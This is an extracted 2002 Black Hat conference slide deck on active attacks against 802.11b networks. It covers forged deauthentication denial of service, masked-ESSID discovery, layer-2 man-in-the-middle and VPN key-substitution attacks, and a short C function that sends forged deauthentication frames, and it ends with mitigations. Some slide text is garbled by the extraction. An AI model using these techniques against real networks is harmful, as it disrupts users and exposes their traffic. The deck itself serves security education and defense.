Advanced 802.11 Attack

8/14/2019 Advanced 802.11 Attack

1/43

7/31/2002 Black Hat 2002, Las Vegas NV

Advanced 802.11 Attack

Mike Lynn

&

Robert Baird


2/43


What Is NOT Covered

Wired Equiv. Privacy (WEP)vulnerabilities

WEP Key cracking techniquesRadio signal amplification

Suggested changes to the IEEE

802.11b specificationWireless network discovery tools


3/43


What Will Be Covered

Wireless network best practices

Practical attacks

The focus of the attack(s) The network layers The bottom 2 layers Custom (forged) 802.11b management frames

The Tool Box Drivers Utilities Proof of concept code


4/43


What Will Be Covered

Attack Scenarios Denial of service

Masked ESSID detection 802.11b layer MITM attack Inadequate VPN implementations

Mitigation Strategies


5/43


Wireless Best Practices

Enable WEP - Wired equivalent privacy Key rotation when equipment supports it

Disable broadcast of ESSIDBlock null ESSID connection

Restrict access by MAC address

Use VPN technology

Use strong mutual authentication


6/43


Practical AttacksWEP Can be cracked passively

Masked ESSID Can be passively observed inmanagement frames during association

Block null ESSID connects Same problemInstall VPN Weakly authenticated VPN issusceptible to active attack (MITM)

Strong mutual authentication - ?


7/43


8/43


The Bottom Layers

Manipulating the bottom 2 layers of theOSI Data Link (Layer 2)

Media Access Control (MAC) Access tomedium

Logical Link Control (LLC) Frame sync, flowcontrol

Physical (Layer 1)Radio bit stream

Divided into channels


9/43


The Bottom Layers


10/43


Management Frames

Management frames can controllink characteristics and physical

medium properties802.11b management frames areNOT authenticated

Why is this bad?


11/43


The Tool BoxCustom Drivers Air-Jack

Custom driver for PrismII (HFA384x) cards MAC address setting/spoofing

Send custom (forged) management frames AP forgery/fake AP

Lucent/Orinoco Linux driver modified to allow MAC address

setting/spoofing from the command line

Utilities User space programs wlan-jack, essid-jack,

monkey-jack, kracker-jack


12/43


Air-Jack DriverAllows control of wireless card modes Modes 0 and 1 standard documented modes

BSS (infrastructure) (1) or IBSS (0) (Ad-hoc)

Pseudo-IBSS (3) mode Control channel selection Firmware handles timing sensitive functions

Mode 5 - undocumented Channel selection

Firmware handles time sensitive functions

No beacons sent

Very little firmware intervention


13/43


Air-Jack Driver Mode 6 Host Access Point mode

Sends Beacons (firmware control)

Responds to Probe request

Handles time sensitive functions

Can enable PrismII monitor mode

Uses Linux PF_PACKET interface

for RX and TX of raw frames


14/43


Air-Jack Drivervoid send_deauth (__u8 *dst, __u8 *bssid){

struct {

struct a3_80211 hdr;

__u16 reason;

}frame;memset(&frame, 0, sizeof(frame));

frame.hdr.mh_type = FC_TYPE_MGT;

frame.hdr.mh_subtype = MGT_DEAUTH;

memcpy(&(frame.hdr.mh_mac1), dst, 6);

memcpy(&(frame.hdr.mh_mac2), bssid, 6);memcpy(&(frame.hdr.mh_mac3), bssid, 6);

frame.reason = 1;

send(socket, &frame, sizeof(frame), 0);

}


15/43


Attack Scenarios WLAN-Jack

Denial of Service De-authentication Use MAC address of Access Point

Send deauthenticate frames

Send continuously

Send to broadcast address or specific MAC

Users are unable to reassociate with AP

Air-Jack + WLAN-Jack


16/43




17/43



Airopeek Trace


18/43



Airopeek Trace


19/43



Decode of Deauthentication Frame


20/43



This is yourconnection


21/43



This is yourconnection onWLAN-Jack.


22/43


Attack Scenarios ESSID-Jack

Is the ESSID a shared secret?

If I mask the ESSID from the APbeacons then unauthorized users will

not be able to associate with my AP?Discover Masked ESSID Send a deauthenticate frame to the

broadcast address.

Obtain ESSID contained in client proberequest or AP probe response.


23/43




24/43


Attack Scenarios - ESSID-Jack

Airopeek Trace


25/43



Airopeek Trace

k i k


26/43


Attack Scenarios Monkey-Jack

MITM AttackTaking over connections at layer 1 and 2

Insert attack machine between victim and

access pointManagement frames Deauthenticate victim from real AP

Send deauthenticate frames to the victim using

the access points MAC address as the source

k S i k


27/43



Victims 802.11 card scans channels tosearch for new AP

Victims 802.11 card associates with

fake AP on the attack machineFake AP is on a different channel than the

real one

Attack machines fake AP is duplicating MAC

address and ESSID of real AP

A k S i M k


28/43



Attack machine associates with realAPAttack machine duplicates MAC address

of the victims machine.

Attack machine is now insertedand can pass frames through in a

manner that is transparent to theupper level protocols

Att k S i M k


29/43



Before Monkey-Jack

Att k S i M k


30/43



After Monkey-Jack

Att k S i M k


31/43


Attack Scenarios - Monkey-Jack

Att k S i K k


32/43


Attack Scenarios Kracker-Jack

Dangers of wireless MITM Wireless networks are more vulnerable to

MITM attacks than wired networks.

Many security solutions are implementedwith an assumption of a secure layer 1 and2

Many VPN solutions are implemented with

inadequate authentication for protectionagainst wireless MITM attacks.

Att k S i K k


33/43



WAVEsec An open source software solution for

securing wireless networks Uses FreeS/WAN IPSEC implementation Will thwart passive eavesdropping of

wireless network communications. Implementation options

X.509 CertificatesSecure DNS

Att k S i K k


34/43



Authenticating with WAVEsec gateway Client sends modified DHCP request with

clients public key

WAVEsec gateway inserts clients publickey into DNS record

Client obtains WAVEsec gateways publickey by requesting it from the DNS server

IPSEC tunnel setup

Att k S i K k


35/43



Using Kracker-Jack KJ inserts to 802.11 layer (like monkey-jack)

KJ, using a DNS request, gets victimspublic key from DNS server

KJ, using the victims MAC address sends

DHCP request with its own key to replacethe victims key in the DNS server

Att k S i K k


36/43



KJ initiates ISAKMP main mode SA with theWAVEsec server

KJ initiates ISAKMP main mode SA withvictim

Victim gets new server key by DNSrequest serviced by KJ

Two separate IPSEC tunnels are now setup All traffic passes through KJ unencrypted

Att k S i K k


37/43



Att k S i K k


38/43



IKE ISAKMP/Oakley Phase 1

Messages 1 and 2 negotiate characteristics of

security association; no authenticationMessages 3 and 4 exchange random values

(nonce) and execute Diffie-Hellman exchangeto establish a master key (SKEYID); noauthentication

Messages 5 and 6 exchange information formutually authenticating the parties; identitypayload, signature payload, and OPTIONALcertificate payload

Attack Scenarios Kracker


39/43



IKE ISAKMP/Oakley Phase 2 Oakley Quick Mode

Define Security Associations

Define keys used to protect IP datagrams


40/43


Attack Scenarios

Shared key authentication attack Observe plain text challenge

Observe cipher text response XOR plain text with cipher text to get

key stream

XOR IP packet with key stream re-using IV Broadcast ping


41/43


Mitigation Strategies

Big guy with a stick

Wireless IDS and Monitoring AirDefense http://www.airdefense.net

VPN + Strong mutual authentication

RF Signal shaping Avoiding signal leaks Antennas with directional radiation pattern Lower Access Point power
http://www.airdefense.net/http://www.airdefense.net/http://www.airdefense.net/http://www.airdefense.net/


42/43


Summary

Wireless networks are more susceptible toactive attacks than wired networks

Enable all built-in security capabilities

Use VPN with strong mutual authenticationMonitor wireless network medium (airspace) for suspicious activity

Updates Black Hat web site or http://802.11ninja.net


43/43

Advanced 802.11 Attack

RobertBaird

&Mike Lynn

Documents

Advanced 802.11 Attack